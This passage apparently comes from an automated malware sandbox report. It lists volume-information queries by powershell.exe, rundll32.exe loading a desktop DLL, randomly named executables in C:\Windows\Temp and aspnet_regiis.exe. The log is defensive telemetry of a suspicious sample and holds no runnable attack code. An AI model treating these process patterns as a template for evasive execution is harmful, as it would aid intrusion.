                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\SystemCoreHelper.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeQueries volume information: C:\Windows\Temp\zbjnkzvo4cc.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeQueries volume information: C:\Windows\Temp\mxtvcgq32fe.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
